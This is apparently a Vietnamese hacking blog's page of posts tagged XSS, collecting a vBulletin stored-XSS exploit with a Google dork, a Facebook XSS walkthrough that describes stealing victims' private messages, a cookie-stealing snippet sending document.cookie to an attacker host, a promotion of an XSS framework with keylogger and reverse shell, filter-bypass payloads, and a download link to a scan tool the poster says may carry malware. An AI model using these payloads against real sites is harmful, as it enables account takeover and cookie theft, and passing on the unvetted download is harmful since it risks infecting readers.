Hiển thị các bài đăng có nhãn XSS. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn XSS. Hiển thị tất cả bài đăng

vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability

HTML Code:
##########################################################################################
#
# Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
##########################################################################################
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##########################################################################################
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility. 
# Intended for authorized web application pentesting only!
#
######################################################################################

Xem Thêm

 

Khai thác lỗ hổng XSS/CSS trên Facebook

Cross Site Scripting (còn được gọi là XSS hay CSS) là một trong những kỹ thuật tấn công tầng ứng dụng (L7) phổ biến nhất.

Thông thường, hầu hết kiểu khai thác Cross-Site Scripting đều liên quan đến việc gửi cookie của nạn nhân tới máy của kẻ tấn công thông qua Javascript.<script>
document.write("<img src='http://attackersite/a.gif?x=" + escape(document.cookie + "'>")
</script>[/i]
Trong khi khai thác lỗ hổng Cross-Site Scripting, kẻ tấn công sẽ không dựa vào cookie mà chúng đánh cắp được, mà attacker có thể tiêm code Javascript vào website của nạn nhân. Attacker cũng có thể thực hiện các hành động nguy hiểm khác.

xssattack

Trong trường hợp đối với Fb, quá trình được diễn ra như sau:

1. Đọc messages cá nhân của nạn nhân.
2. Lấy và chỉnh sửa ảnh cá nhân của nạn nhân.
3. Gửi thông điệp tới những contacts của nạn nhân.
4. Thêm những ứng dụng Facebook mới.
5. Đánh cắp contacts.

Mô tả chi tiết khai thác lỗ hổng Cross-Site Scripting trên Fb.

Facebook sử dụng PHP scripts. Scripts này đã bị khai thác từ tháng 7/2010. http://www.facebook....ve_uploader.php

Script chứa những thông số khác nhau, một trong số chúng - controller_id: đầu vào trực tiếp bên trong của một thẻ script của người dùng. Vd: http://www.facebook....0&post_upload=1

HTML body mà chúng ta cần quan tâm:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["c4c288b438ed080"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Bạn sẽ nhận thấy rằng giá trị controller_id (c4c288b438ed080) được viết trực tiếp bên trong đoạn Javascript của trang HTML. Bằng cách chèn double quote, attacker có khả năng thoát khỏi chuỗi key của array và chèn  Javascript trực tiếp bên trong một trang facebook.com, thay đổi thông số controller_id dễ dàng:

controller_id=test”]}; alert(“facebook test”); //

Điều này làm thay đổi nội dung sau:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["test"]}; alert("facebook test"); //"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Nội dung này sẽ chạy alert box:

facebook_xss

Ở giai đoạn này attacker cần phải làm là đọc nội dung JSON giống như client-side scripts của Fb.

Cách thức khai thác lỗ hổng XSS để chiếm tài khoản Fb

Để đạt được mục đích này, attacker có thể gọi file mở rộng .js trên Web Server của anh ta để add thêm nhiều code.  Số frameworks giúp chuyên gia bảo mật hoặc attacker khai thác lỗ hổng CSS, giống như BeEF.

Trong TH này, chúng ta sẽ tùy biến code để chỉ định những tính năng nào được hiển thị.

Javascript code hướng dẫn web browser của nạn nhân đọc danh sách private messages tìm thấy trên http://www.facebook..../home/inbox.php. Code phân tích từng ID message. Với mỗi message, Javascript code của attacker sẽ đọc được message http://www.facebook..../ReadThread.php.

Cuối cùng, attacker có thể nhận được nội dung message trực tiếp từ máy chủ web server của anh ta.

Trong đoạn video dưới đây, chúng ta sẽ thấy cách thức attacker gửi nội dung nhạy cảm của victim thông qua Facebook chat.


Tham khảo thêm tại:

[1] - http://www.acunetix....e-scripting.htm
[i][2] - http://www.acunetix....ss-facebook.htm


Nguồn: Bảo Mật Hệ Thống.

Xem Thêm

 

XSS Shell

Xem Thêm

 

Xenotix XSS Exploit Framework v.2 Released

Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject codes into a webpage which are vulnerable to XSS.
test report.

Features: 

Built in XSS Payloads
XSS Key logger
XSS Executable Drive-by downloader
Automatic XSS Testing
XSS Encoder
 XSS Reverse Shell (new)

Download: https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip

Xem Thêm

 

[Tutorial] Tut check XSS locate.apple.com theo phương thức Post

Victim: locate.apple.com

Công cụ: Live HTTP để bắt các request
Bước 1: Vào trang chủ:locate.apple.comClick chuột vào tab Services, Bật Live HTTP sau đó bắt request


Bước 2:Bật Live HTTP chương trình như sauBước 3:Các bạn nhìn thấy request Post trong hình rồi bây giờ click tab header->Để ý vào mục Post-> sau đo click vào Replay để request lạiBước 4:Để ý trong nội dung Send Post content?. Mình sẽ thêm Script XSS ở đây mình thêm script sau
<script>alert('Check by kakavn_85')</script>  sau vị trí location=Sai đó ấn nút replay đợi 1 lúc sẽ hiện ra kết quả như sauEnd Tut: kakavn_85

Xem Thêm

 

Cross-site Scripting Vulnerability in WordPress GD Star Rating Plugin

Vector: Remote
Severity: Low
Patch: Unpatched
Impact: Cross-site Scripting (XSS)
Software: WordPress GD Star Rating Plugin 1.x , vulnerable versions: <=1.9.7
A cross-site scripting (XSS) vulnerability has been discovered in WordPress GD Star Rating Plugin.
An input validation error exists in wp-content/plugins/gd-star-rating/widgets/widget_top.php while processing the data passed to the parameter "wpfn". A remote attacker can send a specially crafted HTTP request to the vulnerable application and execute arbitrary html and scripting code in user`s browser in context of a vulnerable website.
Further exploitation of this vulnerability may result in stealing potentially sensitive to the user information, such as cookies, or disguising the information presented on the website.

Demo:
Click here to view!

Xem Thêm

 

Books/Tutorials XSS, LFI, RFI, SQLI

Xem Thêm

 

XSS Master Guide FOR ALL XPERTS and NOOBS

This is a detailed guide to everything XSS.

What is XSS?
XSS stands for Cross Site Scripting. Sometimes it is called CSS however that is often confused with Cascading Style Sheets so XSS is the preferred term.
Cross Site Scripting is a means to take advantage of web applications that take user input but aren't filtered properly. This allows an attacker to inject HTML or other codes such as Javascript into the server to manipulate it in some way.

Xem Thêm

 

Bypass XSS filters

Đa số các "bộ lọc" sẽ sử dụng cách cơ bản nhất là chặn các thẻ <script></script>.

Chúng ta sẽ cùng xem một số VD sau:

+Sử dụng các thuộc tính của các thẻ html:


<body onload=alert('test1')>
<b onmouseover=alert('Wufff!')>click me!</b>
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

+Sử dụng thuộc tính SRC:
<IMG SRC=javascript:alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
Encode nội dung (UTF-8)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

+Sử dụng URI đã được encode base64
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">

Chú ý: một số code có thể không chạy được trên một số trình duyệt.
Đây chỉ là một ít trong số rất nhiều cách thực thi các đoạn mã javascript
Các bạn có thể tham khảo thêm tại: http://ha.ckers.org/xss.html

Xem Thêm

 

[Software] Tool Scan XSS


Mình download trên mạng có thể dính em bé mọi người thấy thích thì download về dùng


Tool scan XSS | Juno_okyo's Blog


http://www.mediafire.com/?crdx77ueotbh8u1
Pass download: vhb

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương